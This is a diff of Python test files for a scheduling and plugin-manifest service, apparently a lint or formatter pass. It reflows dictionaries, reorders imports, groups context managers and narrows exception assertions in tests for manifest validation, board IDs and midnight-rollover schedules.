-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": "invalid"}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": "invalid"}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("variables must be an object" in e for e in errors)
@@ -1244,8 +1215,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects non-dict variables.groups."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"groups": "invalid"}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": {"groups": "invalid"}}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("variables.groups must be an object" in e for e in errors)
@@ -1254,8 +1224,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects non-dict variables.arrays."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"arrays": "invalid"}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": {"arrays": "invalid"}}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("variables.arrays must be an object" in e for e in errors)
@@ -1264,8 +1233,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects array schema that is not a dict."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"arrays": {"routes": "invalid"}}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "variables": {"arrays": {"routes": "invalid"}}}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("routes must be an object" in e for e in errors)
@@ -1274,8 +1242,12 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects array schema missing item_fields."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "variables": {"arrays": {"routes": {"label_field": "name"}}}}
+        data = {
+            "id": "test",
+            "name": "Test",
+            "version": "1.0.0",
+            "variables": {"arrays": {"routes": {"label_field": "name"}}},
+        }
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("missing item_fields" in e for e in errors)
@@ -1284,8 +1256,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects non-dict max_lengths."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "max_lengths": "invalid"}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "max_lengths": "invalid"}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("max_lengths must be an object" in e for e in errors)
@@ -1294,8 +1265,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects max_lengths with non-positive integer values."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "max_lengths": {"temp": 0}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "max_lengths": {"temp": 0}}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("positive integer" in e for e in errors)
@@ -1304,8 +1274,7 @@ class TestValidateManifestEdgeCases:
         """validate_manifest rejects max_lengths with non-integer values."""
         from src.plugins.manifest import validate_manifest
 
-        data = {"id": "test", "name": "Test", "version": "1.0.0",
-                "max_lengths": {"temp": "five"}}
+        data = {"id": "test", "name": "Test", "version": "1.0.0", "max_lengths": {"temp": "five"}}
         is_valid, errors = validate_manifest(data)
         assert not is_valid
         assert any("positive integer" in e for e in errors)
@@ -1325,12 +1294,12 @@ class TestLoadManifestFunction:
 
     def test_load_manifest_invalid_json(self):
         """load_manifest returns error for invalid JSON."""
+        from unittest.mock import mock_open, patch
+
         from src.plugins.manifest import load_manifest as _load_manifest
-        from unittest.mock import patch, mock_open
 
         bad_json = "{invalid json content"
-        with patch("pathlib.Path.exists", return_value=True), \
-             patch("builtins.open", mock_open(read_data=bad_json)):
+        with patch("pathlib.Path.exists", return_value=True), patch("builtins.open", mock_open(read_data=bad_json)):
             result, errors = _load_manifest(Path("fake/manifest.json"))
 
         assert result is None
@@ -1339,11 +1308,14 @@ class TestLoadManifestFunction:
 
     def test_load_manifest_generic_read_exception(self):
         """load_manifest returns error when file read fails."""
-        from src.plugins.manifest import load_manifest as _load_manifest
         from unittest.mock import patch
 
-        with patch("pathlib.Path.exists", return_value=True), \
-             patch("builtins.open", side_effect=PermissionError("denied")):
+        from src.plugins.manifest import load_manifest as _load_manifest
+
+        with (
+            patch("pathlib.Path.exists", return_value=True),
+            patch("builtins.open", side_effect=PermissionError("denied")),
+        ):
             result, errors = _load_manifest(Path("fake/manifest.json"))
 
         assert result is None
@@ -1352,17 +1324,18 @@ class TestLoadManifestFunction:
 
     def test_load_manifest_parse_exception(self):
         """load_manifest returns error when from_dict raises."""
+        from unittest.mock import mock_open, patch
+
         from src.plugins.manifest import load_manifest as _load_manifest
-        from unittest.mock import patch, mock_open
 
         valid_json = '{"id": "test", "name": "Test", "version": "1.0.0"}'
-        with patch("pathlib.Path.exists", return_value=True), \
-             patch("builtins.open", mock_open(read_data=valid_json)), \
-             patch("src.plugins.manifest.PluginManifest.from_dict",
-                   side_effect=KeyError("boom")):
+        with (
+            patch("pathlib.Path.exists", return_value=True),
+            patch("builtins.open", mock_open(read_data=valid_json)),
+            patch("src.plugins.manifest.PluginManifest.from_dict", side_effect=KeyError("boom")),
+        ):
             result, errors = _load_manifest(Path("fake/manifest.json"))
 
         assert result is None
         assert len(errors) == 1
         assert "Failed to parse manifest" in errors[0]
-

--- a/tests/test_schedule_board_id_bug.py
+++ b/tests/test_schedule_board_id_bug.py
@@ -6,9 +6,10 @@ Schedules created with a real board_id (e.g., from multi-board UI) were
 silently ignored because the polling loop only looked for board_id="".
 """
 
-import pytest
-from datetime import datetime, timezone
+from datetime import UTC, datetime
 from unittest.mock import Mock, patch
+
+import pytest
 
 
 class TestCheckAndSendActivePageBoardId:
@@ -17,12 +18,14 @@ class TestCheckAndSendActivePageBoardId:
     @pytest.fixture
     def service_with_board(self):
         """Create a DisplayService with mocked dependencies that has a board with ID."""
-        with patch('src.main.Config') as mock_config, \
-             patch('src.main.get_settings_service') as mock_get_settings, \
-             patch('src.main.get_page_service') as mock_get_page, \
-             patch('src.main.get_schedule_service') as mock_get_schedule, \
-             patch('src.main.get_carousel_service'), \
-             patch('src.main.get_trigger_service') as mock_get_trigger:
+        with (
+            patch("src.main.Config") as mock_config,
+            patch("src.main.get_settings_service") as mock_get_settings,
+            patch("src.main.get_page_service") as mock_get_page,
+            patch("src.main.get_schedule_service") as mock_get_schedule,
+            patch("src.main.get_carousel_service"),
+            patch("src.main.get_trigger_service") as mock_get_trigger,
+        ):
             mock_config.validate.return_value = True
             mock_config.get_summary.return_value = {}
             mock_config.get_transition_settings.return_value = {"strategy": None}
@@ -57,6 +60,7 @@ class TestCheckAndSendActivePageBoardId:
             mock_get_trigger.return_value = trigger_service
 
             from src.main import DisplayService
+
             svc = DisplayService()
             svc.vb_client = Mock()
             svc.vb_client.send_formatted.return_value = True
@@ -67,21 +71,23 @@ class TestCheckAndSendActivePageBoardId:
         """check_and_send_active_page must pass the first board's ID to get_active_page_id."""
         svc, schedule_service = service_with_board
 
-        mock_now = datetime(2025, 6, 15, 12, 0, tzinfo=timezone.utc)
+        mock_now = datetime(2025, 6, 15, 12, 0, tzinfo=UTC)
         mock_time_service = Mock()
         mock_time_service.get_current_time.return_value = mock_now
 
-        with patch.object(svc, '_check_trigger_override', return_value=None), \
-             patch('src.time_service.get_time_service', return_value=mock_time_service):
+        with (
+            patch.object(svc, "_check_trigger_override", return_value=None),
+            patch("src.time_service.get_time_service", return_value=mock_time_service),
+        ):
             svc.check_and_send_active_page()
 
             # The schedule service MUST be called with board_id="board-abc-123"
             schedule_service.get_active_page_id.assert_called_once()
             call_kwargs = schedule_service.get_active_page_id.call_args
             # board_id should be passed (either as kwarg or positional)
-            assert call_kwargs.kwargs.get("board_id") == "board-abc-123" or \
-                   (len(call_kwargs.args) >= 3 and call_kwargs.args[2] == "board-abc-123"), \
-                f"Expected board_id='board-abc-123', got call: {call_kwargs}"
+            assert call_kwargs.kwargs.get("board_id") == "board-abc-123" or (
+                len(call_kwargs.args) >= 3 and call_kwargs.args[2] == "board-abc-123"
+            ), f"Expected board_id='board-abc-123', got call: {call_kwargs}"
 
 
 class TestGetActiveRefIdBoardId:
@@ -90,11 +96,13 @@ class TestGetActiveRefIdBoardId:
     @pytest.fixture
     def service_with_board(self):
         """Create a DisplayService with mocked dependencies that has a board with ID."""
-        with patch('src.main.Config') as mock_config, \
-             patch('src.main.get_settings_service') as mock_get_settings, \
-             patch('src.main.get_page_service'), \
-             patch('src.main.get_schedule_service') as mock_get_schedule, \
-             patch('src.main.get_trigger_service'):
+        with (
+            patch("src.main.Config") as mock_config,
+            patch("src.main.get_settings_service") as mock_get_settings,
+            patch("src.main.get_page_service"),
+            patch("src.main.get_schedule_service") as mock_get_schedule,
+            patch("src.main.get_trigger_service"),
+        ):
             mock_config.validate.return_value = True
             mock_config.get_summary.return_value = {}
             mock_config.get_transition_settings.return_value = {"strategy": None}
@@ -111,6 +119,7 @@ class TestGetActiveRefIdBoardId:
             mock_get_schedule.return_value = schedule_service
 
             from src.main import DisplayService
+
             svc = DisplayService()
 
             yield svc, schedule_service
@@ -119,16 +128,16 @@ class TestGetActiveRefIdBoardId:
         """_get_active_ref_id must pass the first board's ID to get_active_page_id."""
         svc, schedule_service = service_with_board
 
-        mock_now = datetime(2025, 6, 15, 14, 0, tzinfo=timezone.utc)
+        mock_now = datetime(2025, 6, 15, 14, 0, tzinfo=UTC)
         mock_time_service = Mock()
         mock_time_service.get_current_time.return_value = mock_now
 
-        with patch('src.time_service.get_time_service', return_value=mock_time_service):
+        with patch("src.time_service.get_time_service", return_value=mock_time_service):
             result = svc._get_active_ref_id()
 
             assert result == "page-2"
             schedule_service.get_active_page_id.assert_called_once()
             call_kwargs = schedule_service.get_active_page_id.call_args
-            assert call_kwargs.kwargs.get("board_id") == "board-xyz-789" or \
-                   (len(call_kwargs.args) >= 3 and call_kwargs.args[2] == "board-xyz-789"), \
-                f"Expected board_id='board-xyz-789', got call: {call_kwargs}"
+            assert call_kwargs.kwargs.get("board_id") == "board-xyz-789" or (
+                len(call_kwargs.args) >= 3 and call_kwargs.args[2] == "board-xyz-789"
+            ), f"Expected board_id='board-xyz-789', got call: {call_kwargs}"

--- a/tests/test_schedules_midnight_rollover.py
+++ b/tests/test_schedules_midnight_rollover.py
@@ -9,12 +9,13 @@ These tests verify that:
 6. Gap detection handles wraparound schedules correctly
 """
 
-import pytest
 import tempfile
-from pathlib import Path
 from datetime import time
+from pathlib import Path
 
-from src.schedules.models import ScheduleEntry, ScheduleCreate
+import pytest
+
+from src.schedules.models import ScheduleCreate, ScheduleEntry
 from src.schedules.service import ScheduleService
 from src.schedules.storage import ScheduleStorage
 
@@ -22,7 +23,7 @@ from src.schedules.storage import ScheduleStorage
 @pytest.fixture
 def temp_storage_file():
     """Create a temporary storage file."""
-    with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.json') as f:
+    with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".json") as f:
         temp_path = f.name
     yield temp_path
     Path(temp_path).unlink(missing_ok=True)
@@ -46,11 +47,7 @@ class TestMidnightRolloverValidation:
     def test_schedule_crossing_midnight_validates(self):
         """Schedule 23:00-03:00 should be valid (crosses midnight)."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -58,11 +55,7 @@ class TestMidnightRolloverValidation:
     def test_schedule_ending_at_midnight_validates(self):
         """Schedule 23:00-00:00 should be valid (ends at midnight)."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="00:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="00:00", day_pattern="all", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -70,11 +63,7 @@ class TestMidnightRolloverValidation:
     def test_schedule_2345_to_0000_validates(self):
         """Schedule 23:45-00:00 should be valid (15-min ending at midnight)."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:45",
-            end_time="00:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:45", end_time="00:00", day_pattern="all", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -82,11 +71,7 @@ class TestMidnightRolloverValidation:
     def test_schedule_2300_to_0015_validates(self):
         """Schedule 23:00-00:15 should be valid (short wraparound)."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="00:15",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="00:15", day_pattern="all", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -94,34 +79,20 @@ class TestMidnightRolloverValidation:
     def test_midnight_rollover_is_valid(self):
         """is_valid() should return True for midnight rollover schedules."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.is_valid() is True
 
     def test_same_start_end_time_still_invalid(self):
         """Schedule with same start and end (12:00-12:00) should be invalid (zero duration)."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="12:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="12:00", end_time="12:00", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) > 0, "Zero-duration schedule should be invalid"
 
     def test_normal_schedule_still_validates(self):
         """Normal schedule 09:00-17:00 should still validate correctly."""
         entry = ScheduleEntry(
-            page_id="page-work",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="page-work", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -138,99 +109,63 @@ class TestMidnightRolloverTimeMatching:
     def test_time_in_evening_portion_matches(self):
         """Time 23:30 should match schedule 23:00-03:00."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("23:30") is True
 
     def test_time_at_start_matches(self):
         """Time 23:00 should match schedule 23:00-03:00 (start inclusive)."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("23:00") is True
 
     def test_time_in_morning_portion_matches(self):
         """Time 01:00 should match schedule 23:00-03:00."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("01:00") is True
 
     def test_time_at_midnight_matches(self):
         """Time 00:00 should match schedule 23:00-03:00."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("00:00") is True
 
     def test_time_at_end_does_not_match(self):
         """Time 03:00 should NOT match schedule 23:00-03:00 (end exclusive)."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("03:00") is False
 
     def test_time_outside_wraparound_does_not_match(self):
         """Time 15:00 should NOT match schedule 23:00-03:00."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("15:00") is False
 
     def test_time_just_after_end_does_not_match(self):
         """Time 03:15 should NOT match schedule 23:00-03:00."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("03:15") is False
 
     def test_time_just_before_start_does_not_match(self):
         """Time 22:45 should NOT match schedule 23:00-03:00."""
         entry = ScheduleEntry(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-night", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("22:45") is False
 
     def test_normal_schedule_time_matching_unaffected(self):
         """Normal schedule 09:00-17:00 should still match correctly."""
         entry = ScheduleEntry(
-            page_id="page-work",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-work", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("12:00") is True
         assert entry.applies_to_time("09:00") is True
@@ -249,46 +184,33 @@ class TestAdjacentSchedules:
 
     def test_adjacent_schedules_no_overlap(self, service):
         """Schedules 09:00-12:00 and 12:00-15:00 should NOT overlap."""
-        service.create_schedule(ScheduleCreate(
-            page_id="morning-page",
-            start_time="09:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="morning-page", start_time="09:00", end_time="12:00", day_pattern="all", enabled=True
+            )
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="afternoon-page",
-            start_time="12:00",
-            end_time="15:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="afternoon-page", start_time="12:00", end_time="15:00", day_pattern="all", enabled=True
+            )
+        )
 
         result = service.validate_schedules()
         assert result.valid is True, (
-            f"Adjacent schedules should not overlap, but got: "
-            f"{[o.conflict_description for o in result.overlaps]}"
+            f"Adjacent schedules should not overlap, but got: {[o.conflict_description for o in result.overlaps]}"
         )
         assert len(result.overlaps) == 0
 
     def test_adjacent_quarter_hour_schedules_no_overlap(self, service):
         """Schedules 14:00-14:15 and 14:15-14:30 should NOT overlap."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-a",
-            start_time="14:00",
-            end_time="14:15",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-a", start_time="14:00", end_time="14:15", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-b",
-            start_time="14:15",
-            end_time="14:30",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-b", start_time="14:15", end_time="14:30", day_pattern="all", enabled=True)
+        )
 
         result = service.validate_schedules()
         assert result.valid is True, (
@@ -299,29 +221,17 @@ class TestAdjacentSchedules:
 
     def test_three_adjacent_schedules_no_overlap(self, service):
         """Three back-to-back schedules should have no overlaps."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-1",
-            start_time="06:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-1", start_time="06:00", end_time="12:00", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-2",
-            start_time="12:00",
-            end_time="18:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-2", start_time="12:00", end_time="18:00", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-3",
-            start_time="18:00",
-            end_time="23:45",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-3", start_time="18:00", end_time="23:45", day_pattern="all", enabled=True)
+        )
 
         result = service.validate_schedules()
         assert result.valid is True
@@ -338,21 +248,13 @@ class TestWraparoundOverlapDetection:
 
     def test_two_wraparound_schedules_overlap(self, service):
         """Two wraparound schedules (22:00-02:00 and 23:00-04:00) should overlap."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-night1",
-            start_time="22:00",
-            end_time="02:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-night1", start_time="22:00", end_time="02:00", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-night2",
-            start_time="23:00",
-            end_time="04:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-night2", start_time="23:00", end_time="04:00", day_pattern="all", enabled=True)
+        )
 
         result = service.validate_schedules()
         assert result.valid is False
@@ -360,21 +262,13 @@ class TestWraparoundOverlapDetection:
 
     def test_normal_and_wraparound_overlap(self, service):
         """Normal 00:00-08:00 and wraparound 23:00-02:00 should overlap."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-early",
-            start_time="00:00",
-            end_time="08:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-early", start_time="00:00", end_time="08:00", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-night",
-            start_time="23:00",
-            end_time="02:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-night", start_time="23:00", end_time="02:00", day_pattern="all", enabled=True)
+        )
 
         result = service.validate_schedules()
         assert result.valid is False
@@ -382,21 +276,13 @@ class TestWraparoundOverlapDetection:
 
     def test_normal_and_wraparound_no_overlap(self, service):
         """Normal 10:00-15:00 and wraparound 20:00-02:00 should NOT overlap."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-day",
-            start_time="10:00",
-            end_time="15:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-day", start_time="10:00", end_time="15:00", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-night",
-            start_time="20:00",
-            end_time="02:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-night", start_time="20:00", end_time="02:00", day_pattern="all", enabled=True)
+        )
 
         result = service.validate_schedules()
         assert result.valid is True
@@ -404,21 +290,15 @@ class TestWraparoundOverlapDetection:
 
     def test_wraparound_adjacent_to_normal_no_overlap(self, service):
         """Wraparound 22:00-06:00 and normal 06:00-12:00 should NOT overlap."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-night",
-            start_time="22:00",
-            end_time="06:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="page-night", start_time="22:00", end_time="06:00", day_pattern="all", enabled=True)
+        )
 
-        service.create_schedule(ScheduleCreate(
-            page_id="page-morning",
-            start_time="06:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="page-morning", start_time="06:00", end_time="12:00", day_pattern="all", enabled=True
+            )
+        )
 
         result = service.validate_schedules()
         assert result.valid is True
@@ -435,39 +315,27 @@ class TestActivePageWithWraparound:
 
     def test_active_page_during_evening_of_wraparound(self, service):
         """At 23:30 on Monday, wraparound schedule 23:00-03:00 should be active."""
-        service.create_schedule(ScheduleCreate(
-            page_id="night-page",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="night-page", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True)
+        )
 
         page_id = service.get_active_page_id(time(23, 30), "monday")
         assert page_id == "night-page"
 
     def test_active_page_during_morning_of_wraparound(self, service):
         """At 01:00, wraparound schedule 23:00-03:00 should be active."""
-        service.create_schedule(ScheduleCreate(
-            page_id="night-page",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="night-page", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True)
+        )
 
         page_id = service.get_active_page_id(time(1, 0), "tuesday")
         assert page_id == "night-page"
 
     def test_active_page_outside_wraparound_falls_to_default(self, service):
         """At 15:00, wraparound schedule should not match; use default."""
-        service.create_schedule(ScheduleCreate(
-            page_id="night-page",
-            start_time="23:00",
-            end_time="03:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="night-page", start_time="23:00", end_time="03:00", day_pattern="all", enabled=True)
+        )
         service.set_default_page("default-page")
 
         page_id = service.get_active_page_id(time(15, 0), "monday")

--- a/tests/test_schedules_models.py
+++ b/tests/test_schedules_models.py
@@ -1,31 +1,29 @@
 """Tests for schedule data models."""
 
-import pytest
 from datetime import datetime
+
+import pytest
+from pydantic import ValidationError
+
 from src.schedules.models import (
-    ScheduleEntry,
+    Gap,
+    Overlap,
     ScheduleCreate,
+    ScheduleEntry,
     ScheduleUpdate,
     ScheduleValidationResult,
-    Overlap,
-    Gap,
 )
 
 
 class TestScheduleEntry:
     """Test ScheduleEntry model."""
-    
+
     def test_create_schedule_entry_all_days(self):
         """Test creating a schedule entry for all days."""
         entry = ScheduleEntry(
-            id="test-id",
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            id="test-id", page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
-        
+
         assert entry.id == "test-id"
         assert entry.page_id == "page-123"
         assert entry.start_time == "09:00"
@@ -33,34 +31,24 @@ class TestScheduleEntry:
         assert entry.day_pattern == "all"
         assert entry.custom_days is None
         assert entry.enabled is True
-    
+
     def test_create_schedule_entry_weekdays(self):
         """Test creating a schedule entry for weekdays."""
         entry = ScheduleEntry(
-            id="test-id",
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
+            id="test-id", page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
         )
-        
+
         assert entry.day_pattern == "weekdays"
         assert entry.custom_days is None
-    
+
     def test_create_schedule_entry_weekends(self):
         """Test creating a schedule entry for weekends."""
         entry = ScheduleEntry(
-            id="test-id",
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekends",
-            enabled=True
+            id="test-id", page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="weekends", enabled=True
         )
-        
+
         assert entry.day_pattern == "weekends"
-    
+
     def test_create_schedule_entry_custom_days(self):
         """Test creating a schedule entry with custom days."""
         entry = ScheduleEntry(
@@ -70,103 +58,69 @@ class TestScheduleEntry:
             end_time="17:00",
             day_pattern="custom",
             custom_days=["monday", "wednesday", "friday"],
-            enabled=True
+            enabled=True,
         )
-        
+
         assert entry.day_pattern == "custom"
         assert entry.custom_days == ["monday", "wednesday", "friday"]
-    
+
     def test_schedule_entry_generates_id(self):
         """Test that schedule entry generates UUID if not provided."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        )
-        
+        entry = ScheduleEntry(page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
+
         assert entry.id is not None
         assert len(entry.id) == 36  # UUID length
-    
+
     def test_schedule_entry_has_timestamps(self):
         """Test that schedule entry has created_at timestamp."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        )
-        
+        entry = ScheduleEntry(page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
+
         assert entry.created_at is not None
         assert isinstance(entry.created_at, datetime)
         assert entry.updated_at is None
-    
+
     def test_validate_time_format(self):
         """Test validation of time format (HH:MM)."""
         # Valid times
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:45",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="09:00", end_time="17:45", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) == 0
-    
+
     def test_validate_time_format_invalid(self):
         """Test validation fails with invalid time format."""
         # Pydantic validates the pattern before our custom validation
-        with pytest.raises(Exception):  # Pydantic ValidationError
-            entry = ScheduleEntry(
+        with pytest.raises(ValidationError):
+            ScheduleEntry(
                 page_id="page-123",
                 start_time="9:00",  # Should be 09:00
                 end_time="17:00",
                 day_pattern="all",
-                enabled=True
+                enabled=True,
             )
-    
+
     def test_validate_any_minute_value(self):
         """Test validation accepts any minute value (0-59)."""
         # All minutes should now be valid (15-min restriction removed)
         for minute in [0, 5, 10, 15, 22, 30, 37, 45, 59]:
             entry = ScheduleEntry(
-                page_id="page-123",
-                start_time=f"09:{minute:02d}",
-                end_time="17:00",
-                day_pattern="all",
-                enabled=True
+                page_id="page-123", start_time=f"09:{minute:02d}", end_time="17:00", day_pattern="all", enabled=True
             )
             errors = entry.validate_config()
             assert len(errors) == 0, f"Minute {minute} should be valid but got: {errors}"
-    
+
